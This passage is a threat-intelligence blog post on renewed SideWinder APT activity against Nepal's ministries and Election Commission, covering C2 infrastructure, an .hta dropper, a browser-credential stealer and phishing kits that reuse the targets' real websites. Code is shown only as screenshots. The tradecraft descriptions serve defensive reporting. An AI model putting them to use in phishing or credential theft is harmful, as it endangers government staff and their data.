DeepEnd Research, Mila Parkour, 2021-03-08<br />Renewed SideWinder Activity in South Asia<br /><br />A few months ago, <a href="https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html">Trend Micro released a post</a> summarizing the SideWinder APT group's activity over the past year, showcasing SideWinder's mobile malware development aspirations and its spear phishing campaigns targeting the government and military of Nepal, the government of Afghanistan, the state-owned Myanma Posts and Telecommunications company, the Chinese Ministry of Foreign Affairs, and several other entities. <br /><br />The SideWinder APT, also tracked as RAZOR TIGER, APT-C-17, and Rattlesnake, has picked its targets in the South Asia region in multiple previous campaigns [<a href="https://www.trendmicro.com/en_us/research/20/a/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group.html">1</a>, <a href="https://securelist.com/apt-trends-report-q1-2018/85280/">2</a>, <a href="https://s.tencent.com/research/report/479.html">3</a>]. SideWinder's targets mainly consist of Nepal, Pakistan, Afghanistan, and China, along with some other countries seen in the group's known past activity. This threat group is believed by some to be associated with Indian interests and seems to mainly target government and military entities in its espionage attacks. 
<br /><br />While hunting through internet-wide scan data provided by BinaryEdge, we encountered a server hosting an executable file that led us to uncover renewed activity by the SideWinder group, picking up right where they left off in their previous year of operation.<div><br /></div><div><u>Key Findings:</u><br /><ul style="text-align: left;"><li>The group renewed its spear phishing activity with new domains registered to target government entities in Nepal.</li><li>Nepal recently cancelled its upcoming elections scheduled for 30 April and 10 May 2021.</li><li>We uncovered evidence that the group is likely targeting Nepal's Election Commission.</li><li>There is evidence of continued malware development by the group.</li></ul><div><span style="color: #ffa400; font-family: inherit; font-size: x-large; text-decoration-line: underline; white-space: pre-wrap;"><br /></span></div><div style="text-align: center;"><span style="color: #ffa400; font-family: inherit; text-decoration-line: underline; white-space: pre-wrap;"><span style="font-size: medium;">Command and Control</span></span></div><p></p>The server that was the starting point of our investigation returned the following shellcode in the scan response we checked on port 8087.<div> <span id="docs-internal-guid-d83bef61-7fff-7011-8729-5c8ef44020f7"><span><p dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; vertical-align: baseline; white-space: pre-wrap;"></p></span></span><span><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp4Ow6580z-Hss4UIbnpYvhdlk26o1e-2uuYWO4ZY0-MsJfVfpTViY1RZr6CT8UO-1xyHKAPrr2HtmsbAM8KvGeShGaoYsYufIJyR4S7eN9CYVqkfTAdYhkSvoWpy5jDKJQUnbXHQvBRSl/s954/1.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="284" data-original-width="954" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp4Ow6580z-Hss4UIbnpYvhdlk26o1e-2uuYWO4ZY0-MsJfVfpTViY1RZr6CT8UO-1xyHKAPrr2HtmsbAM8KvGeShGaoYsYufIJyR4S7eN9CYVqkfTAdYhkSvoWpy5jDKJQUnbXHQvBRSl/w640-h190/1.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Server's raw response showing an expected C2 domain connection.</td></tr></tbody></table><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline;"><br /></div></span></span>Outputting this raw data for initial analysis and triage, we managed to figure out this was most likely 2nd stage malware being used for Command and Control purposes through this server.</div><div> <span><span><p dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; vertical-align: baseline; white-space: pre-wrap;"></p><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIqfN-PFj8dZYIs_poo7uibeVuAJQtpDnXJlVKAzuqdvM3iT7Az7U8cDsOF4QbrhX8dLq_SNQULctPnc-OynYAhTnymgqUNoSyEx4rgRZiGT2QupKMhcvzqCiGUfu3WYfleOuLdU4mArPg/s569/2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="569" height="359" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIqfN-PFj8dZYIs_poo7uibeVuAJQtpDnXJlVKAzuqdvM3iT7Az7U8cDsOF4QbrhX8dLq_SNQULctPnc-OynYAhTnymgqUNoSyEx4rgRZiGT2QupKMhcvzqCiGUfu3WYfleOuLdU4mArPg/w400-h359/2.png" width="400" /></a></div></span></span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb0L2BJd0444f1yd_g4NeI_g9LYrCb12jwC4OGRp7WtsNgJmXSVuKJLBcZcfjqQ1acso52MrV8UKYeCEZmyIoXMJQEKqRXk23xGxAU0pQ977DX9lG9bodfH9oyxw2jUl9hoDVsnEa45mhj/s758/libraries.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="189" data-original-width="758" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb0L2BJd0444f1yd_g4NeI_g9LYrCb12jwC4OGRp7WtsNgJmXSVuKJLBcZcfjqQ1acso52MrV8UKYeCEZmyIoXMJQEKqRXk23xGxAU0pQ977DX9lG9bodfH9oyxw2jUl9hoDVsnEa45mhj/w640-h160/libraries.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">PE-Studio showing us the malware's used libraries, headers, references, and compilation date.</td></tr></tbody></table><div style="text-align: left;"><br /></div><div style="text-align: left;">And as we continued our search throughout the server, we realized that it was also communicating with what looked to be 1st stage malware via port 8085. 
We think that such 1st stage malware is being used in SideWinder’s spear phishing attacks, and we suspect that a sample of one was <a href="https://www.virustotal.com/gui/file/66dcaaa42e3f36f0560af741017c13c528758140f0f7f4260b9213739ffd9e70/">uploaded in January</a> to VirusTotal.</div><div style="text-align: left;"><span style="font-family: inherit; font-size: 11pt; text-align: center; white-space: pre-wrap;"> </span></div>Upon further search, we managed to find the 2nd stage payload that was being used by the group and hosted on this server via a simple text file encoded in Base64. After a straightforward decode, we were able to see the code used by the threat actor for the 2nd stage payload they are utilizing.<span><blockquote style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXbEp63DNpfhhciLgRMSGy5hUUpBmoB252P2EluMKmHsMX2X8owWtZ97PpmTzfswpnF1wuldMbaMzHw8S7pbPrnD3wGqg3aGOBqux4QERB8ZcEGYNjdSjVYk-7zvhOEDdl-hqFr4G68IM6/s635/meterpy.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="576" data-original-width="635" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXbEp63DNpfhhciLgRMSGy5hUUpBmoB252P2EluMKmHsMX2X8owWtZ97PpmTzfswpnF1wuldMbaMzHw8S7pbPrnD3wGqg3aGOBqux4QERB8ZcEGYNjdSjVYk-7zvhOEDdl-hqFr4G68IM6/s16000/meterpy.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Meterpreter 2nd Stage Payload code excerpt.</td></tr></tbody></table><div dir="ltr" style="margin-left: 0pt; text-align: center;"><br /></div></blockquote></span>We immediately had our assumption verified, as we were able to see that the server is being used for command and control purposes using a meterpreter based payload written in 
Python.</div><div><br /><span><div style="text-align: center;"><span style="color: #ffa400; font-family: inherit; text-decoration-line: underline; white-space: pre-wrap;"><span style="font-family: inherit; font-size: medium;">First Stage Payload</span></span></div><p></p><p style="font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline;">An example of what we suspect this group is using that precedes the command and control infrastructure we first laid eyes on was this malware file uploaded to VirusTotal:</p><p style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"></p></span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0TuyQIM3x0m_w5BOEx987_Tvto-K3-fH4FEihD0NFWOm4kO42zD5ZFtDmSSGA0uxBi1tn7EieGAIjMJygDOQaNUSM6lFeDs94ww0AVJqg-JNH-zSjaJAvzzeC5zbaoOS-sOOK4MKhqyX1/s770/3.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="378" data-original-width="770" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0TuyQIM3x0m_w5BOEx987_Tvto-K3-fH4FEihD0NFWOm4kO42zD5ZFtDmSSGA0uxBi1tn7EieGAIjMJygDOQaNUSM6lFeDs94ww0AVJqg-JNH-zSjaJAvzzeC5zbaoOS-sOOK4MKhqyX1/w640-h314/3.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">An .hta file most likely attached to spear phishing emails.</td></tr></tbody></table><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline;"><span></span></div><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline;"><br /></div><div class="separator" style="clear: both; font-variant-east-asian: 
normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline;">We suspect that this actor is using malicious <a href="https://www.virustotal.com/gui/file/ddc19d1421e2eed9c606c4249fab0662f1253e441da2f1285242cb03d5be5b32/detection">.hta files</a> attached to emails; the files contain links to decoy document lures along with 1st stage malware embedded in the hta files. Here we see such an embedded link to a PE file disguised as a .txt file, which deploys spyware upon execution.</div><div style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><span><span id="docs-internal-guid-a4cf7889-7fff-4d5c-738f-ea3082331513"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">Once this spyware is downloaded, the malware checks the environment it’s running in and attempts to identify the infected machine’s IP address with an external HTTP request.</p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br /></p></span><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn0KFrbYAwC5XOmJVh3-B7l-e-yxvkORsz0QpVRSubx9w91JkVXdC9Y_A5Tax9CBPUn1kFJnlmbOopXBSLzd8pi1Bl-H1DIPKNspnBQzNIrc1v_NQn9BZ8_mvD2iX50YaqhUU5ZryhKnxH/s655/4.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="343" data-original-width="655" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn0KFrbYAwC5XOmJVh3-B7l-e-yxvkORsz0QpVRSubx9w91JkVXdC9Y_A5Tax9CBPUn1kFJnlmbOopXBSLzd8pi1Bl-H1DIPKNspnBQzNIrc1v_NQn9BZ8_mvD2iX50YaqhUU5ZryhKnxH/w640-h336/4.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">External request to an 
online IP check API.</td></tr></tbody></table></span></span><div style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></div>This sample is another Python-based malware. After execution it runs in the background, builds a database file of logins extracted from browser files, and archives all of the infected machine's downloads, documents, and desktop files in preparation for exfiltration.</div><span><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKzAZLqIZY2QJ2p3amNsgHLSMD35wVGwVGxX8e1oAOCU5LePPdYsdN_3Uwf-HYYdwN7WzRv8UORU3vv0rji6dFYD6UZRhiKZAZKKP5nsyK3aAnvVKkl_M6efJ4xkKoTF8VGarZB9zlpLAo/s920/6.png" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="220" data-original-width="920" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKzAZLqIZY2QJ2p3amNsgHLSMD35wVGwVGxX8e1oAOCU5LePPdYsdN_3Uwf-HYYdwN7WzRv8UORU3vv0rji6dFYD6UZRhiKZAZKKP5nsyK3aAnvVKkl_M6efJ4xkKoTF8VGarZB9zlpLAo/w640-h154/6.png" width="640" /></span></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Utilizing the WriteFile function to write the stolen data to files.</td></tr></tbody></table>Immediately after execution, the malware attempts to steal files, writing the stolen browser data to a "Loginvault.db" file and to .zip archives named after the folder location, the machine's IP address, and a datestamp.<br /><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td 
style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDPlijxTFnBqgD1PfJTe3AyFUsGxKCyQLPZipPsewU4wfFu9BUVb2ekcWhk0Cm92BPXN1emTJHBTsZuaqrhyJxI8DsiQ9na3kgs6yZWqZtBGBlaFpTmJ-ciaFaDRZCXudNsBuq22-zH2Nc/s932/7.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="385" data-original-width="932" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDPlijxTFnBqgD1PfJTe3AyFUsGxKCyQLPZipPsewU4wfFu9BUVb2ekcWhk0Cm92BPXN1emTJHBTsZuaqrhyJxI8DsiQ9na3kgs6yZWqZtBGBlaFpTmJ-ciaFaDRZCXudNsBuq22-zH2Nc/w640-h264/7.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Exfiltration attempt to the C2 server using port 8080.</td></tr></tbody></table><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline;"><br /></div></span></span>This spyware sample takes us directly to the spear phishing efforts we suspect SideWinder may be conducting while using similar malware techniques.</div><div><span><span><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline;"><br /></div><span id="docs-internal-guid-e32062aa-7fff-d69b-c831-dc1feeb8baf1"><p dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center; vertical-align: baseline;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><span style="color: #ffa400; font-family: inherit; font-size: medium;">Spear Phishing</span></span></p></span><span><p dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left; 
vertical-align: baseline;"><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;"><br /></span></p></span></span></span>Another finding we encountered while searching through the contents and configuration of this server was the set of decoy pages SideWinder is using to phish its intended targets. When we looked at what was being hosted, we were surprised to find the server serving as a single staging point for much of the group’s phishing activity (on top of some mobile malware development efforts we cover further along in the post). <br /><br />Various dynamic DNS names resolved to the server's main IP address, and almost all of the domain names follow naming schemes that mimic the naming conventions of the real entities SideWinder is targeting. <br /><br />SideWinder remains firmly focused on the same entities it previously attempted to target, as showcased in Trend Micro’s report, while adding some additional in-country organizations to its target list. <br /><br />Over the last few weeks, the group appears to have renewed its activity and started to ramp up attack efforts against its targets of choice. For example, through our investigation of the server we found that the group is renewing its efforts against government entities of Nepal and is setting up phishing infrastructure to launch such campaigns. 
<br /><br />From our findings, it seems that SideWinder has added the Ministry of Physical Infrastructure and Transport of Nepal to its list of targets and is still actively trying to gain access to other government offices of the country.</div><div><br /><div style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><span><span><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7U6NN_fwR4eOEHtXDib_7P5YqsBPurVcLC5-x3GknJewfSAyZXs1v155ZRll9_fk3oHz4y2BkdCvBAy1gsFN_qofsfuN0O0ZJ3hNy0bqnNTHu5aBtmyZvxi3tt9nuZAmxnougUP8Bim3_/s1327/8.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="931" data-original-width="1327" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7U6NN_fwR4eOEHtXDib_7P5YqsBPurVcLC5-x3GknJewfSAyZXs1v155ZRll9_fk3oHz4y2BkdCvBAy1gsFN_qofsfuN0O0ZJ3hNy0bqnNTHu5aBtmyZvxi3tt9nuZAmxnougUP8Bim3_/w640-h450/8.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="text-align: left;">Ministry of Physical Infrastructure and Transport of Nepal domain and login panel.</span></td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span>Another such target in Nepal is the Ministry of Foreign Affairs, with a preceding lure intended to motivate the recipient to log in with their credentials in order to continue reading the decoy article planted by the threat actor. 
In this case, a press release by the Nepal Mission to the UN pertaining to the COVID-19 situation around the region, and human rights issues.</div><div style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /><span><span><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPaepBnTJY8xwHlYgttjxwylJO27h-knNjslTxeKIdPS6mGLI6fhN9QluUew-EyHpbSt6Nz5hrAtQISnDV9ZL6pupE-TO8yEKHDPMIaZ68nQB64WfJ20uuVuJxemb3oZyoBPCEmigEzxRr/s1920/9.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="930" data-original-width="1920" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPaepBnTJY8xwHlYgttjxwylJO27h-knNjslTxeKIdPS6mGLI6fhN9QluUew-EyHpbSt6Nz5hrAtQISnDV9ZL6pupE-TO8yEKHDPMIaZ68nQB64WfJ20uuVuJxemb3oZyoBPCEmigEzxRr/w640-h310/9.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="text-align: left;">Ministry of Foreign Affairs decoy lure.</span></td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span>A short while after accessing the link the unsuspecting reader will be redirected to the Ministry’s login page.</div><div style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /><div class="separator" style="clear: both;"><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPQNfZ67_Sr_YHgcvCXNfX0Hq2ATOc2O_g5zx9pd1P8cn73bHS83jkpaWX7hdDPhhUsybbvsr5EJXYhWUOYuj-vgjtddRjTkmJTbfTKGnGHWO-Z1EwnOrTk6PlQLQ6-vh6PcIt-PO0Dhmg/s1920/10.png" 
style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="928" data-original-width="1920" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPQNfZ67_Sr_YHgcvCXNfX0Hq2ATOc2O_g5zx9pd1P8cn73bHS83jkpaWX7hdDPhhUsybbvsr5EJXYhWUOYuj-vgjtddRjTkmJTbfTKGnGHWO-Z1EwnOrTk6PlQLQ6-vh6PcIt-PO0Dhmg/w640-h310/10.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="text-align: left;">After a redirect from the lure article, the reader is redirected to this login panel.</span></td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div>Here <a href="https://github.com/omriher/CapTipper">CapTipper</a></span> is showcasing us the ~15 seconds it takes to get redirected from the initial decoy article to the login panel.</div><div class="separator" style="clear: both;"><br /><span><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SL_Gr2R0rrFs4JESs5S-53uifykXn8ftb5Qq4FjgEKTV0EZ76SUrWP5STiXnqcc6Fh6thl94IBAO0ZjI0ZHp66FpWWzC992rsV6QwnKLzqxtCBtmpHxdYWWDUeuiJCZamtCBQeQlj_d9/s1717/11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="773" data-original-width="1717" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SL_Gr2R0rrFs4JESs5S-53uifykXn8ftb5Qq4FjgEKTV0EZ76SUrWP5STiXnqcc6Fh6thl94IBAO0ZjI0ZHp66FpWWzC992rsV6QwnKLzqxtCBtmpHxdYWWDUeuiJCZamtCBQeQlj_d9/w640-h288/11.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div></span>The phishing efforts being conducted by the group in this activity are reliant on the content delivery backbone of the actual target website to deliver all of the page's media and redirect to it once credentials are entered. 
In other words, the actor-controlled server only hosts basic phishing kits that use the target's own content delivery network to mimic the login panel being targeted. </div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"><span><span><span><span><span style="font-family: Arial;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD7B5CtxW2-Hu-iUIEpkmTxmL7MFdxxHq34vOiDWPjDPnrCBH7Ftxsm7OG_yewESecyTrIoiKBFqXVjvJdJrMRIBZNbxwqJ69vX18NpZXdu5mvw6WbhrgdzpA11ctua4fgYsvJcRj7S2ik/s1144/12.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="173" data-original-width="1144" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD7B5CtxW2-Hu-iUIEpkmTxmL7MFdxxHq34vOiDWPjDPnrCBH7Ftxsm7OG_yewESecyTrIoiKBFqXVjvJdJrMRIBZNbxwqJ69vX18NpZXdu5mvw6WbhrgdzpA11ctua4fgYsvJcRj7S2ik/w640-h96/12.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The fake page making lookup requests to the real Nepal Foreign Affairs government website.</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span>Other decoy tricks employed by the group in this campaign are error messages hardcoded into the phishing pages. 
One example is in a phishing page spoofing the Nepal central government email system:</div><div class="separator" style="clear: both;"><br /><span><span><span><span><span style="font-family: Arial;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBc1oZ-KH5clLLEx4_LihiwfKnZFmJUq6HOK_cyFzYZENmWfTeVCx2ifOB3KODTzXhQJxH9b2SoFd3oen5VXap132fU0-ss9Uuavxjj_KUTu-HzSY7KmmMCOav2axIbp2AZRZAxPrvz2Ek/s1654/13.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="757" data-original-width="1654" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBc1oZ-KH5clLLEx4_LihiwfKnZFmJUq6HOK_cyFzYZENmWfTeVCx2ifOB3KODTzXhQJxH9b2SoFd3oen5VXap132fU0-ss9Uuavxjj_KUTu-HzSY7KmmMCOav2axIbp2AZRZAxPrvz2Ek/w640-h292/13.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Source code showing the hardcoded error message.</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span>Another is hardcoded in the phishing page targeting the Ministry of Defense:</div><div class="separator" style="clear: both;"><br /><div class="separator" style="clear: both; text-align: left;"><span><span><span><span><span style="font-family: Arial;"><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKMl6tLh2cEjZJVQnaNejkjY4GJVManYIRYMNwr4tt14ZOWBbE3eBxveN36yruMLQTZWmpEsXWFukCGeyVx996tUZhSEkJSAuht4hV5pCs7pwr53P_Hdsm-D1LZDgc60Sf_NukFBDGQp98/s695/14.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="604" 
data-original-width="695" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKMl6tLh2cEjZJVQnaNejkjY4GJVManYIRYMNwr4tt14ZOWBbE3eBxveN36yruMLQTZWmpEsXWFukCGeyVx996tUZhSEkJSAuht4hV5pCs7pwr53P_Hdsm-D1LZDgc60Sf_NukFBDGQp98/w400-h348/14.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Ministry of Defense login panel with a hardcoded error.</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span></span><div class="separator" style="clear: both;">We believe this is a social engineering tactic: the error message adds a pretext that further entices the recipient to enter their login credentials.<br /><br />We have also seen renewed attention to organizations such as the state-owned Nepal Telecom, while the group continues to reuse the real website’s content backbone, including the reCaptcha widget.</div><div class="separator" style="clear: both;"><br /><span><span><span><span><span style="font-family: Arial;"><span><span><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzeSe17Qm6WScaj19lKb7ysbDamu9DkiA8owxyperHJ-gY3CijWkDd6RkCASIdQvfdGsCA1ckmKwXLJYb7sGfnGJtcHNgY8kcly6YI-q1wZXgnspC1eX2OBQazMShAefR9O3o2Kn2kdRuq/s1920/15.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="918" data-original-width="1920" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzeSe17Qm6WScaj19lKb7ysbDamu9DkiA8owxyperHJ-gY3CijWkDd6RkCASIdQvfdGsCA1ckmKwXLJYb7sGfnGJtcHNgY8kcly6YI-q1wZXgnspC1eX2OBQazMShAefR9O3o2Kn2kdRuq/w640-h306/15.png" width="640" 
/></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Nepal Telecom phishing page piggybacking the reCaptcha widget.</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span></span></span><div>As you can see, the SideWinder group is still very interested in targeting entities located in Nepal. We also found a particularly interesting phishing page hosted on this server for what we believe is a new and current target focus for the group.</div><div><span style="font-family: Arial;"><br /></span>This new phishing target seems to be the Election Commission of Nepal:</div><div><br /><span><span><span><span><span style="font-family: Arial;"><span><span><span><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFeB9i1PyQp_5cpVAddWsB_RhHL_pV99BhiQnUO-UIolO8SmxD-OWmX9pImX3SbzU9c9ZeFzbbnXIRqN-T8qrhYfYEX4zkcEn6RB-HZE2SFk6Hi9Iyu-5etMeicxFPFWTk4eVslTjvFj0G/s1427/16.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="777" data-original-width="1427" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFeB9i1PyQp_5cpVAddWsB_RhHL_pV99BhiQnUO-UIolO8SmxD-OWmX9pImX3SbzU9c9ZeFzbbnXIRqN-T8qrhYfYEX4zkcEn6RB-HZE2SFk6Hi9Iyu-5etMeicxFPFWTk4eVslTjvFj0G/w640-h348/16.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">A phishing page targeting the Election Commission of Nepal.</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span></span></span></span>As we've shown previously, the actor is again utilizing the same tactic of loading 
